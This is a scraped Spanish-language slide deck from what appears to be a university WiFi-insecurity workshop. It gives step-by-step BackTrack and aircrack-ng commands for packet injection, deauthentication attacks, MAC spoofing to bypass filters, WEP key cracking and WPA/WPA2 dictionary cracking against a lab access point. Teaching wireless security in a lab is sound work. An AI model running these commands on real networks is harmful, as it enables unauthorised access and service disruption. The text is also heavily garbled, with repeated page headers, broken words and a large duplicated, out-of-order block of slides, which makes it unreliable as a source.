httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
